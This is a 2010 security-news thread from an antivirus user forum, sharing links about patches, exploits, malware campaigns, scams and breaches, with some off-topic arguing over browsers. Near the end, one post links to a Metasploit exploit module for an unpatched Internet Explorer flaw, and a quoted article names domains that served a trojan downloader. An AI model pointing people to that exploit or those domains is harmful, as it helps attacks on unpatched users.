http://secunia.com/advisories/42112/
Update for Adobe Reader fixes 19 holes
http://www.adobe.com/support/security/bulletins/apsb10-28.html
I don't want to sidetrack this thread, but this is something that really just drives me nuts. I understand Adobe patches as soon as they can and I appreciate that, even if they take WAY too long to do so. But it's very difficult to keep all of your computers up to date and patched when it requires admin rights in order to run the update.
In the schools that I manage, I don't allow my users to have admin rights, in fact, they pretty much don't have any rights at all, they can barely even open the task manager.
So when I have to go around the school and update adobe on every computer in the lab, the student classrooms, and the teacher computers, I just curse adobe's name. Same goes for iTunes/Quicktime, same goes for shockwave (which asks for admin rights at least, so that's nice), same for Java.
I really wish they'd let standard users update the software somehow, or ask for permission when the install starts instead of just erroring out and quitting. Why can't MS integrate third-party updates in WSUS!!!
Nope, can't do that, you just have to spend $4k on shavlik or something. Ridiculous.
/rant.
-
scythe, the only thing we need, in this case, is a service installed and running or a Windows Task running with admin rights for all users.
-
scythe, the only thing we need, in this case, is a service installed and running or a Windows Task running with admin rights for all users.
And that's not going to happen, since MS won't even let standard users run Windows Updates (unless enabled through group policy). I understand their reasoning though. If it's a business environment, some IT Admins like to test the updates first before deploying them to see if they break applications.
It's frustrating, but there's no win-win situation. You either have to go around to every computer manually and update all the third-party software, or give rights to users that they shouldn't have in order for them to do it themselves.
To me, there's only two ways to fix this. Either the Third-parties need to allow admin creds be entered as the update runs (so we don't have to log off the current user, log in as admin, install the update, then log off and back on as the user), OR, MS needs to integrate at least common third-party software updates, so that admins can authorize them and push them out as needed.
service installed and running or a Windows Task running with admin rights for all users.
Sounds too scary, and if it were exploited, it could cause all kinds of problems. It would work though.
-
Sounds too scary, and if it were exploited, it could cause all kinds of problems. It would work though.
Life is scaring :)
Google already does it. Secunia PSI does it. Some defragmentation tools do it...
avast does it (service) :)
-
Google Chrome tops 'Dirty Dozen' vulnerable apps list
http://www.networkworld.com/news/2010/111510-google-chrome-dirty-dozen.html?t51hb
-
Free ClamWin virus scanner moves most of Windows into quarantine
http://www.h-online.com/open/news/item/Free-ClamWin-virus-scanner-moves-most-of-Windows-into-quarantine-1139430.html
-
Free ClamWin virus scanner moves most of Windows into quarantine
http://www.h-online.com/open/news/item/Free-ClamWin-virus-scanner-moves-most-of-Windows-into-quarantine-1139430.html
Wow... What a nightmare! 25.000 files sent to Chest!
-
Wow... What a nightmare! 25.000 files sent to Chest!
Well, it sure is a nightmare...!!
We don't like that to happen with avast, do we..!!?? ;)
asyn
-
Quiet Merger, Gang Warfare, or Mere Deception?
http://blogs.mcafee.com/mcafee-labs/quiet-merger-gang-warfare-or-mere-deception
-
Whoa, Google, That’s A Pretty Big Security Hole
http://techcrunch.com/2010/11/20/whoa-google-thats-a-pretty-big-security-hole/
-
Whoa, Google, That’s A Pretty Big Security Hole
http://techcrunch.com/2010/11/20/whoa-google-thats-a-pretty-big-security-hole/
See thisUpdate 4: Google says the issue is now resolved: “We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to security@google.com.”
-
See this
Update 4: Google says the issue is now resolved: “We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to security@google.com.”
I know that, Kenny... I read the content before posting it..! ;)
Still, affected users should at least know about the issue, imo...
asyn
-
Exploit for unpatched Stuxnet hole
http://www.h-online.com/security/news/item/Exploit-released-for-unpatched-Stuxnet-hole-1140196.html
-
Free ClamWin virus scanner moves most of Windows into quarantine
http://www.h-online.com/open/news/item/Free-ClamWin-virus-scanner-moves-most-of-Windows-into-quarantine-1139430.html
Wow... What a nightmare! 25.000 files sent to Chest!
That was cool.... :P
-
Avira blocks security tool and struggles with memory leak
http://www.h-online.com/security/news/item/Avira-blocks-security-tool-and-struggles-with-memory-leak-1140478.html
-
Avira blocks security tool and struggles with memory leak
http://www.h-online.com/security/news/item/Avira-blocks-security-tool-and-struggles-with-memory-leak-1140478.html
I confirm latest update of Avira is highly buggy (Avira 10 Service Pack 1). It cause shutdown problem in Windows XP SP3 (I've seen many people are reporting that in Avira forum and moderators confirmed known problem), slow down in webguard which slow internet speed a lot, BSOD and also unstable firewall. I don't know what's going on in behind scense, this is first time Avira release such a bad update.
Edit:
I asked Avira for a comment, These are what I got:
Michael (Avira Moderator):
There is not really a need to install the pre-sp1 version of aVir. The posted workaround solves also the problem with the memory leak.
Actual there is no information available what the reason for this leak is or which installed programs/drivers are the reason for the leak.
Avira (In Facebook):
As you can see in the article we commented to heise online already. A patch is in development and will be shipped soon. Affected are only a few systems, far below the promille border. The very shortly blocked Secunia PSI was corrected immediatly after we received the notification.
-
Virus infecting Stony Brook computers
"Students, staff and faculty using computers on the Stony Brook University networks should be on the lookout for a virus that disguises itself as security software called ThinkPoint, according to a post on the university’s Division of Information Technology site on Monday."
http://www.sbstatesman.com/virus-attacking-stony-brook-computers786
-
Cross-Border Korean Shelling Leads to FAKEAV
News outlets all over the world are talking about the recent cross-border clash between North and South Korea. The shelling, one of the worst incidents between the two countries in years, is naturally being used by cybercriminals behind fake antivirus malware.
http://blog.trendmicro.com/cross-border-korean-shelling-leads-to-fakeav
-
Free anti-virus for Mac - 150,000 active users and plenty of malware found
http://nakedsecurity.sophos.com/2010/11/18/free-anti-virus-for-mac-150000-active-users-and-plenty-of-malware-found/
-
F-Secure Stuxnet Redux: Questions and Answers with video
http://www.f-secure.com/weblog/archives/00002066.html
-
BitDefender: 20% of Facebook news feeds contain infections
http://www.h-online.com/security/news/item/BitDefender-20-of-Facebook-news-feeds-contain-infections-1141060.html
-
Secunia got hijacked
http://secunia.com/blog/153/
http://isc.sans.edu/diary.html?storyid=9994
-
http://www.theregister.co.uk/2010/11/24/windows_0day_report/
Windows 0day allows malicious code execution
Antimalware provider Prevx has sounded the alarm about a serious vulnerability in fully patched versions of Microsoft Windows. It allows attackers to execute malware, even in versions designed to withstand such exploits.............. (read more)
Windows in trouble again ::)
XP/Vista/Win7 32 and 64 bit affected.
-
Windows 0day allows malicious code execution
Thanks, Adrian...!!!
asyn
Some related links:
http://www.prevx.com/blog/160/New-Windows-day-exploit-speaks-chinese.html
http://www.vupen.com/english/advisories/2010/3058
https://twitter.com/msftsecresponse/status/7590788200402945
-
Super Virus A Target For Cyber Terrorists
A super virus that was used to disrupt Iran's nuclear programme has been traded on the black market and could be used by terrorists, according to Sky News sources.
http://news.sky.com/skynews/Home/World-News/Stuxnet-Worm-Virus-Targeted-At-Irans-Nuclear-Plant-Is-In-Hands-Of-Bad-Guys-Sky-News-Sources-Say/Article/201011415827544?lpos=World_News_News_Your_Way_Region_5&lid=NewsYourWay_ARTICLE_15827544_Stuxnet_Worm%3A_Virus_Targeted_At_Irans_Nuclear_Plant_Is_In_Hands_Of_Bad_Guys%2C_Sky_News_Sources_Say
hmmmm...that was a short url ;D
-
hmmmm...that was a short url ;D
It sure was... ;D 8)
-
Exploit Code Out For New Windows Kernel Flaw
http://goo.gl/TVSX5 (Shortened)
http://threatpost.com/en_us/blogs/exploit-code-out-new-windows-kernel-flaw-112910
-
Exploit Code Out For New Windows Kernel Flaw
http://goo.gl/TVSX5 (Shortened)
Please do not use shortened links.
-
For those who are interested - a guide for the preview of some commonly found shortened urls
http://security.thejoshmeister.com/2009/04/how-to-preview-shortened-urls-tinyurl.html
and a warning for Facebook users
Facebook infested with new worm
http://www.zdnet.com/blog/igeneration/facebook-infested-with-new-worm-more-proof-site-is-insecure/6955?tag=nl.e550
-
Free anti-virus for Mac - 150,000 active users and plenty of malware found
http://nakedsecurity.sophos.com/2010/11/18/free-anti-virus-for-mac-150000-active-users-and-plenty-of-malware-found/
That may convince my stepmom to put an antivirus on her iMac. is the Avast! Mac version free? If not, what free Mac AVs are there?
-
That may convince my stepmom to put an antivirus on her iMac. is the Avast! Mac version free? If not, what free Mac AVs are there?
Please open a new topic for this question.
Thanks.
asyn
-
Nullsoft closes multiple Winamp vulnerabilities
http://forums.winamp.com/showthread.php?t=324322
http://forums.winamp.com/showthread.php?threadid=159785
http://www.winamp.com/media-player/en
-
Latest Koobface news ..... still alive and well
Koobface: Inside a Crimeware Network
http://www.infowar-monitor.net/2010/11/koobface/
Rogue apps 'worst Facebook feed malware baddies' ( Bonus extras will eff up your feed )
http://www.theregister.co.uk/2010/11/24/facebook_malware_survey/
-
ZeuS variant only infects super-fast PCs ( Too tricky for its own bad )
http://www.theregister.co.uk/2010/11/25/snobby_zeus_variant_avoids_bog_standard_pcs/
-
ZeuS variant only infects super-fast PCs ( Too tricky for its own bad )
http://www.theregister.co.uk/2010/11/25/snobby_zeus_variant_avoids_bog_standard_pcs/
Technical info here: http://forum.avast.com/index.php?topic=66267.msg561612#msg561612
asyn
-
Last infection here was a 'Yankee Doodle' in the late 80ies.
I try to eat one of them whenever I find a store that sells them: ;D ;D
(http://www.drakescakeonline.com/images/yankee_doodle_sm.jpg)
-
Last infection here was a 'Yankee Doodle' in the late 80ies.
I try to eat one of them whenever I find a store that sells them: ;D ;D
Lol..! So you are infected with other Yankee Doodle(s)... ;D
http://www.symantec.com/security_response/writeup.jsp?docid=2000-121914-2303-99
asyn
-
Russians on the moon? Canon's image verification system cracked
http://www.h-online.com/security/news/item/Russians-on-the-moon-Canon-s-image-verification-system-cracked-1145443.html
-
Savannah software forge compromised
http://www.h-online.com/open/news/item/Savannah-software-forge-compromised-1145383.html
-
Back door in ProFTPD FTP server
http://www.h-online.com/open/news/item/Back-door-in-ProFTPD-FTP-server-1146592.html
-
Horror AVG (Free and Paid) Update Throws Win7 and other OS’s into Constant Reboot Loops – Ooops…We’re Sorry:
http://www.theregister.co.uk/2010/12/02/avg_auto_immune_update/ (http://www.theregister.co.uk/2010/12/02/avg_auto_immune_update/)
Comment and Temporary Fix from AVG:
http://product-team.blog.avg.com/2010/12/avg-fix-for-computers-running-on-windows-7-64-bit-platform.html?utm_medium=twitter&utm_source=twitterfeed (http://product-team.blog.avg.com/2010/12/avg-fix-for-computers-running-on-windows-7-64-bit-platform.html?utm_medium=twitter&utm_source=twitterfeed)
Edit: Just saw a new thread about this: http://forum.avast.com/index.php?topic=66897.0 (http://forum.avast.com/index.php?topic=66897.0).
-
Horror AVG (Free and Paid) Update Throws Win7 and other OS’s into Constant Reboot Loops – Ooops…We’re Sorry:
http://www.theregister.co.uk/2010/12/02/avg_auto_immune_update/ (http://www.theregister.co.uk/2010/12/02/avg_auto_immune_update/)
Comment and Temporary Fix from AVG:
http://product-team.blog.avg.com/2010/12/avg-fix-for-computers-running-on-windows-7-64-bit-platform.html?utm_medium=twitter&utm_source=twitterfeed (http://product-team.blog.avg.com/2010/12/avg-fix-for-computers-running-on-windows-7-64-bit-platform.html?utm_medium=twitter&utm_source=twitterfeed)
Edit: Just saw a new thread about this: http://forum.avast.com/index.php?topic=66897.0 (http://forum.avast.com/index.php?topic=66897.0).
One year after avast's nightmare...
-
Google Plugs 'High Risk' Chrome Holes, Adds PDF Viewer in Sandbox
http://threatpost.com/en_us/blogs/google-plugs-high-risk-chrome-holes-adds-pdf-viewer-sandbox-120310?utm_source=Newsletter_120310&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
Microsoft Research Develops Zozzle JavaScript Malware Detection Tool
http://threatpost.com/en_us/blogs/microsoft-research-develops-zozzle-javascript-malware-detection-tool-120210?utm_source=Newsletter_120310&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
Ransomware returns: 'If you ever want to see your data again...
'Revamped version of GpCode is out, yet the malware still requires victims to believe kidnappers will return stolen data for a fee
http://infoworld.com/t/malware/ransomware-returns-if-you-ever-want-see-your-data-again-449
-
New Virus: Watch Out for Goo.gl Links on Twitter
http://lifehacker.com/5708311/new-virus-watch-out-for-googl-links-on-twitter
-
OOPS - Root privileges under Linux
http://www.h-online.com/open/news/item/OOPS-Root-privileges-under-Linux-1149758.html
-
Malware "speaks" various languages
http://www.symantec.com/connect/blogs/w32yimfocab-malware-localization (http://www.symantec.com/connect/blogs/w32yimfocab-malware-localization)
-
Fake Amazon Receipt Generator Dupes Merchants
http://threatpost.com/en_us/blogs/fake-amazon-receipt-generator-dupes-merchants-120710?utm_source=Newsletter_120810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
TDL4 Rootkit Now Using Stuxnet Bug
http://threatpost.com/en_us/blogs/tdl4-rootkit-now-using-stuxnet-bug-120710?utm_source=Newsletter_120810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
Microsoft Adds Tracking Protection to IE 9http://threatpost.com/en_us/blogs/microsoft-adds-tracking-protection-ie-9-120710?utm_source=Newsletter_120810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
OpenSSL Security Advisory
http://www.openssl.org/news/secadv_20101202.txt
-
Possible root vulnerability in Exim internet mailer
http://www.h-online.com/open/news/item/Possible-root-vulnerability-in-Exim-internet-mailer-1150631.html
-
‘Tis the Season of DDoS – WikiLeaks Edition.This is the most interesting article i ever read.Read here:http://pandalabs.pandasecurity.com/tis-the-season-of-ddos-wikileaks-editio/ (http://pandalabs.pandasecurity.com/tis-the-season-of-ddos-wikileaks-editio/)Currently this news is very famous over the globe.The anonymous guys on one side fighting for freedom of information and freedom of press.And other people who consider themselves patriots who are trying to defend the greater interests of the United States.Lastly,I know I posted in the wrong topic,it should another topic. :-[
-
Very interesting read.
It truly proves that the grass is always greener on the other side unless you
happen to step into some cow dung. ;D
-
Walgreen's acknowledges theft of customers email addresses.
(http://img.photobucket.com/albums/v190/bob3160/Walgreens.jpg)
-
Walgreen's acknowledges theft of customers email addresses.
Walgreen Co. warns customers e-mail addresses may be in spammer's hands
http://latimesblogs.latimes.com/technology/2010/12/walgreen-co-warns-customers-e-mail-addresses-may-be-in-spammers-hands.html
-
I believe I just said that without having to go to another website ;D
-
Next Tuesday Microsoft to finally fix IE vulnerability
http://www.h-online.com/security/news/item/Next-Tuesday-Microsoft-to-finally-fix-IE-vulnerability-1151069.html
-
Next Tuesday Microsoft to finally fix IE vulnerability
http://www.h-online.com/security/news/item/Next-Tuesday-Microsoft-to-finally-fix-IE-vulnerability-1151069.html
Key commentThe only known exploit is impotent where data execution prevention (DEP) is activated (as it is by default in Internet Explorer 8).
Microsoft Security Bulletin Advance Notification for December 2010
https://www.microsoft.com/technet/security/bulletin/ms10-dec.mspx
-
Finally....
Microsoft to plug critical IE, final Stuxnet Windows holes
http://news.cnet.com/8301-27080_3-20025204-245.html?tag=mncol;title (http://news.cnet.com/8301-27080_3-20025204-245.html?tag=mncol;title)
-
Next Tuesday Microsoft to finally fix IE vulnerability
http://www.h-online.com/security/news/item/Next-Tuesday-Microsoft-to-finally-fix-IE-vulnerability-1151069.html
Key commentThe only known exploit is impotent where data execution prevention (DEP) is activated (as it is by default in Internet Explorer 8).
Microsoft Security Bulletin Advance Notification for December 2010
https://www.microsoft.com/technet/security/bulletin/ms10-dec.mspx
Finally....
Microsoft to plug critical IE, final Stuxnet Windows holes
http://news.cnet.com/8301-27080_3-20025204-245.html?tag=mncol;title (http://news.cnet.com/8301-27080_3-20025204-245.html?tag=mncol;title)
I wish I could say Bull S**t! Microsoft don't usually keep their promised to patch those problem in IE8 better stick with Firefox or Opera for everyday browsing used and only used Windows Update Patch in IE8.
-
I wish I could say Bull S**t! Microsoft don't usually keep their promised to patch those problem in IE8 better stick with Firefox or Opera for everyday browsing used and only used Windows Update Patch in IE8.
Only those stuck on XP and don't have Windows 7 like Firefox. ;)
IE9, FF4 Beta In Real-World Benchmark
http://www.lucidchart.com/blog/2010/09/16/ie9-ff4-beta-in-real-world-benchmark
-
I wish I could say Bull S**t! Microsoft don't usually keep their promised to patch those problem in IE8 better stick with Firefox or Opera for everyday browsing used and only used Windows Update Patch in IE8.
On modern versions of Windows, you don't need IE for Windows updates.
By the way, unless you have credible sources, saying this is a huge troll...
PS: YoKenny, I do wonder what the benchmark they used does in the link you posted...since Chrome 6 has no hardware acceleration but FF 4 Beta and IE 9 Beta do, those "real world" results seem weird.
-
<snip>
Only those stuck on XP and don't have Windows 7 like Firefox. ;)
<snip>
What a patently rubbish sweeping statement, how do you account for those win7 users that use firefox or chrome or opera. Your choice of browser is totally unrelated to the OS you are using as it is the browser, its functions, flexibility, extensions, security, etc. that suit your use of the browser and internet that determine which browser you like best.
My preference of Firefox v IE has nothing to do with the OS being used as that preference was made many years before Vista or win7 every came out.
By your own off the wall statement, you should be using firefox on your XP system :P
Even on XP you don't have to use IE for windows updates, you just use the inbuilt windows update, either Auto or Notify, etc.
-
<snip>
Only those stuck on XP and don't have Windows 7 like Firefox. ;)
<snip>
What a patently rubbish sweeping statement, how do you account for those win7 users that use firefox or chrome or opera. Your choice of browser is totally unrelated to the OS you are using as it is the browser, its functions, flexibility, extensions, security, etc. that suit your use of the browser and internet that determine which browser you like best.
My preference of Firefox v IE has nothing to do with the OS being used as that preference was made many years before Vista or win7 every came out.
By your own off the wall statement, you should be using firefox on your XP system :P
Even on XP you don't have to use IE for windows updates, you just use the inbuilt windows update, either Auto or Notify, etc.
Well said DavidR according to my current Secunia PSI my Firefox browser is fully patch see attachment, and only 1 insecure only in IE8, YoKenny you cannot improved your statement against XP users as DavidR said.
-
IE9, FF4 Beta In Real-World Benchmark
As you keep posting this comment over and over again...
My question is: Do you get paid by MS..?? ;)
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
asyn
-
As you keep posting this comment over and over again...
My question is: Do you get paid by MS..?? ;)
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
asyn
I know some people more spamming that YoKenny with just this one comment (which is accurate rating), asyn!
-
IE9, FF4 Beta In Real-World Benchmark
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
asyn
+1
-
RealNetworks, Inc. Releases Update to Address Security Vulnerabilities
http://service.real.com/realplayer/security/12102010_player/en/
-
My question is: Do you get paid by MS..?? ;)
No.
If I did I would not be stuck in this horrible Canadian climate!
Now if I was Justin Bieber I would be in Costa Rica for the Winter.
http://www.youtube.com/watch?v=_Z5-P9v3F8w
I'd miss October Fest sausage and sauerkraut though. ;D
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
Flexibility to the point of collapse will really be a good philosophy to follow with Security as an afterthought. ;)
Arguing with DavidR is like arguing with my mother who always believed she was correct and died proving it. :o
I bet Justin Bieber uses Windows 7 and would be horrified by XP. ;)
-
I bet Justin Bieber uses Windows 7 and would be horrified by XP. ;)
I don't really care about Justin Bieber...?? ;D
Sorry guys, OT discussion is over now.
asyn
-
<snip>
Arguing with DavidR is like arguing with my mother who always believed she was correct and died proving it. :o
<snip>
There you go again, when you get your ar*e kicked when you use an off the wall sweeping statement, you can't counter the comment, so you change the subject and dive off at another tangent again.
-
<snip>
Arguing with DavidR is like arguing with my mother who always believed she was correct and died proving it. :o
<snip>
There you go again, when you get your ar*e kicked when you use an off the wall sweeping statement, you can't counter the comment, so you change the subject and dive off at another tangent again.
My mother taught me well.
-
There you go again proving my point, diving off in another direction.
I rather doubt she taught you anything, for that to happen you have to be capable of listening, something which appears to come difficult for you.
-
My mother taught me well.
Unfortunately, your trolling is sick and tasteless. Try some more, and maybe you will archieve the perfection!
-
Off the topic my mother taught me to believe in common sense and it very true if it wasn't YoKenny way.
-
Possible root vulnerability in Exim internet mailer
http://www.h-online.com/open/news/item/Possible-root-vulnerability-in-Exim-internet-mailer-1150631.html
Debian and Red Hat close Exim hole
http://www.h-online.com/security/news/item/Debian-and-Red-Hat-close-Exim-hole-1151693.html
-
Gawker.com - Commenting Accounts Compromised — Change Your Passwords
http://gawker.com/5712615/commenting-accounts-compromised-%2B%2B-change-your-passwords
FAQ: http://lifehacker.com/5712785/faq-compromised-commenting-accounts-on-gawker-media
-
"HDD Plus" malware spread through major ad networks, using malvertising and drive-by download
http://blog.armorize.com/2010/12/hdd-plus-malware-spread-through.html
Major Ad Networks Found Serving Malicious Ads
https://threatpost.com/en_us/blogs/major-ad-networks-found-serving-malicious-ads-121210
-
They are somewhat slow of the mark with this 'news' avast had an article in the blogs months ago (like February, almost 10 months ago) about ads poisoning.
http://blog.avast.com/2010/02/18/ads-poisoning-%E2%80%93-jsprontexi/ (http://blog.avast.com/2010/02/18/ads-poisoning-%E2%80%93-jsprontexi/)
-
The Internet Goes to War
If you weren’t paying attention recently, the Internet has gone to war.
http://asert.arbornetworks.com/2010/12/the-internet-goes-to-war/
-
The Internet Goes to War
If you weren’t paying attention recently, the Internet has gone to war.
http://asert.arbornetworks.com/2010/12/the-internet-goes-to-war/
Wikileaks sure shook up the Internet.
-
Over 500 patches for SAP
http://www.h-online.com/security/news/item/Over-500-patches-for-SAP-1153061.html
-
Next Tuesday Microsoft to finally fix IE vulnerability
One IE vulnerability not fixed
http://www.vupen.com/english/advisories/2010/3156
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/129567/en
Two critical updates for Microsoft systems in December 2010
http://www.norman.com/security_center/security_center_archive/2010/133179/en
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/129567/en
Update 2010-12-15
Microsoft has published an update that solves this issue.
More information in Microsoft Security Bulletin MS10-090 (http://www.microsoft.com/technet/security/bulletin/MS10-090.mspx)
It's always nice to post all the information. :)
-
Back door in HP network storage solution
http://www.securityweek.com/backdoor-vulnerability-discovered-hp-msa2000-storage-systems
Update: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c02662287
(HP SUPPORT COMMUNICATION - CUSTOMER ADVISORY)
-
Chaining Bugs to Exploit Browser Plug-Ins
http://threatpost.com/en_us/blogs/chaining-bugs-exploit-browser-plug-ins-121710?utm_source=Newsletter_121710&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
When a smart card can root your computer
http://labs.mwrinfosecurity.com/files/Advisories/mwri_opensc-get-serial-buffer-overflow_2010-12-13.pdf
Patches available: https://www.opensc-project.org/opensc/changeset/4913
-
Twitter, Leaks and Spam
It's quite common to see attackers use hot topics on social networks to force users to click on malicious links. So what would be more interesting these days than using the term “Wikileaks”?
http://www.securelist.com/en/blog/208188050/Twitter_Leaks_and_Spam
-
Google questions results of malicious site protection test
http://www.h-online.com/security/news/item/Google-questions-results-of-malicious-site-protection-test-1155534.html
-
Google questions results of malicious site protection test
http://www.h-online.com/security/news/item/Google-questions-results-of-malicious-site-protection-test-1155534.html
Good one, Thanks!
...The test by NSS Labs was financed by Microsoft.
-
USA: 11.7 MILLION PERSONS REPORTED IDENTITY THEFT VICTIMIZATION IN 2008
http://www.ojp.usdoj.gov/newsroom/pressreleases/2010/BJS11044.htm
-
That's a lot of theft but the info is a little dated since the information
is "water under the bridge" not anything you can do anything about. :)
-
That's a lot of theft but the info is a little dated since the information
is "water under the bridge" not anything you can do anything about. :)
True, Bob.
I don't understand either, why they release the info this late... ;)
# ADVANCE FOR RELEASE AT 10:00 A.M. EST # Thursday, December 16, 2010
-
Off Topic:
I love your Christmas Tree. :)
-
Off Topic:
I love your Christmas Tree. :)
Off Topic:
Can I chop it down on boxing day ;D
-
Off Topic:
I love your Christmas Tree. :)
Thanks Bob..! :)
@Speedy: Well, it won't last till boxing day... ;)
-
Google: New hacked site notifications in search results
http://googlewebmastercentral.blogspot.com/2010/12/new-hacked-site-notifications-in-search.html
-
Virus yearbook 2010 from Panda Security.http://press.pandasecurity.com/news/virus-yearbook-2010/ (http://press.pandasecurity.com/news/virus-yearbook-2010/)
-
Google: New hacked site notifications in search results
http://googlewebmastercentral.blogspot.com/2010/12/new-hacked-site-notifications-in-search.html
nice, that was needed and will avoid a waste of time in verifications sometimes.
-
New Facebook scam
Facebook 'Who Has Deleted Ya' Scam Promises Free iPhone, iPad
http://www.huffingtonpost.com/2010/12/20/who-has-deleted-ya-scam-facebook_n_799195.html
ALERT: Don’t Click On Who Has Deleted Ya Application
http://www.allfacebook.com/alert-dont-click-on-who-has-deleted-ya-application-2010-12
-
Back door in ProFTPD FTP server
http://www.h-online.com/open/news/item/Back-door-in-ProFTPD-FTP-server-1146592.html
Phrack hole closed in ProFTPD
http://www.h-online.com/open/news/item/Phrack-hole-closed-in-ProFTPD-1156782.html
-
Microsoft withdraws flawed Outlook update
http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx
-
SSDD: A New Face on an Established Idea- "Utility Rouges"
http://sunbeltblog.blogspot.com/2010/12/rogues-now-imitate-utilities-rather.html? (http://sunbeltblog.blogspot.com/2010/12/rogues-now-imitate-utilities-rather.html?)
http://news.cnet.com/8301-27080_3-20025692-245.html (http://news.cnet.com/8301-27080_3-20025692-245.html)
-
SSDD: A New Face on an Established Idea- "Utility Rouges"
http://sunbeltblog.blogspot.com/2010/12/rogues-now-imitate-utilities-rather.html? (http://sunbeltblog.blogspot.com/2010/12/rogues-now-imitate-utilities-rather.html?)
http://news.cnet.com/8301-27080_3-20025692-245.html (http://news.cnet.com/8301-27080_3-20025692-245.html)
http://techtalk.pcpitstop.com/2010/12/21/malware-minute-malware-now-imitates-pc-utilities/? (http://techtalk.pcpitstop.com/2010/12/21/malware-minute-malware-now-imitates-pc-utilities/?)
-
A malicious addition to a Facebook link
(http://www.securelist.com/en/images/pictures/klblog/347.jpg)
http://www.securelist.com/en/blog/345/A_malicious_addition_to_a_Facebook_link
-
One IE vulnerability not fixed
http://www.vupen.com/english/advisories/2010/3156
Exploit published for unpatched Internet Explorer vulnerability
http://www.h-online.com/security/news/item/Exploit-published-for-unpatched-Internet-Explorer-vulnerability-1158348.html
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key commentCurrently, Microsoft is unaware of any active exploitation of this vulnerability.
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key commentCurrently, Microsoft is unaware of any active exploitation of this vulnerability.
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
-
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
It can not be displayed ???
-
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
It can not be displayed ???
Try with Firefox... mine is working...
-
It can not be displayed ???
check those kind of sites (Broken/down) here: http://downforeveryoneorjustme.com/ (http://downforeveryoneorjustme.com/)
-
Try with Firefox... mine is working...
I won't install Firefox just for that site! ::)
I would rather be sent to Siberia ;D
-
Try with Firefox... mine is working...
this shows yet again how much IE sucks compared to FF
-
Try with Firefox... mine is working...
this shows yet again how much IE sucks compared to FF
Works just fine in IE9 even if it doesn't make Altarir happy :)
-
Asyn, Please don't post the link to exploit code.
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key commentCurrently, Microsoft is unaware of any active exploitation of this vulnerability.
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=bd656ad91978de9fa2c59aabb81a6693ea9c1294492693d8b8904e3989c87f95-1293126802
sample sendt avast! ;)
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key commentCurrently, Microsoft is unaware of any active exploitation of this vulnerability.
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=bd656ad91978de9fa2c59aabb81a6693ea9c1294492693d8b8904e3989c87f95-1293126802
sample sendt avast! ;)
And what about Firewalls?
They can't stop this exploits attacks?
-
Try with Firefox... mine is working...
this shows yet again how much IE sucks compared to FF
Works just fine in IE9 even if it doesn't make Altarir happy :)
I guess Altarir is familiar with Siberia but not using Windows 7 and using WOT leaves him out in the cold ;)
-
addons.mozilla.org disclosure
http://blog.mozilla.com/security/2010/12/27/addons-mozilla-org-disclosure/
-
addons.mozilla.org disclosure
http://blog.mozilla.com/security/2010/12/27/addons-mozilla-org-disclosure/
I received an email about this directly. This email caused me more concern than the potential issue in the blog article as it looked like the classic phishing email to try and obtain user info. But the IP addresses in the email proved it did com from Mozilla.
It is so long ago that I signed up to the addons section as normally you don't need to unless the addon was experimental. So for me the info was already redundant.
-
addons.mozilla.org disclosure
http://blog.mozilla.com/security/2010/12/27/addons-mozilla-org-disclosure/
The problem is that if you use the same password there than in other forums... They could cross-link the email with the password.
-
***
A misplaced security notice by malcontent from this link:
http://forum.avast.com/index.php?topic=68471.msg575448#msg575448
http://news.softpedia.com/news/Trojan-Distributed-in-New-Mass-Injection-Attack-via-Java-Downloader-174971.shtml
Security researchers warn that a new mass injection attack is underway directing the visitors of hundreds of websites to a malicious Java applet which downloads a trojan.
According to Denis Sinegubko, the creator of the Unmask Parasites Web scanner, the malicious code is added at the end of HTML pages on compromised websites and takes the form of an obfuscated JavaScript function.
When parsed by the browser, this function adds a rogue IFrame to the HTML document, which loads a new.htm page from aubreyserr.com, medien-verlag.de or yennicq.be.
According to statistics from Google's Safe Browsing service, around 2,000 websites link to these domains, giving a rough estimation of the attack's impact so far.
The page called by the IFrame loads a Hidden.jar applet deceptively titled "Java Update." This is a Java OpenConnection-type downloader whose only purpose is to download and execute a file called host.exe.
The three domains serving the malware are actually legitimate, but their corresponding websites have been compromised.
***
-
http://news.softpedia.com/news/Trojan-Distributed-in-New-Mass-Injection-Attack-via-Java-Downloader-174971.shtml
Security researchers warn that a new mass injection attack is underway directing the visitors of hundreds of websites to a malicious Java applet which downloads a trojan.
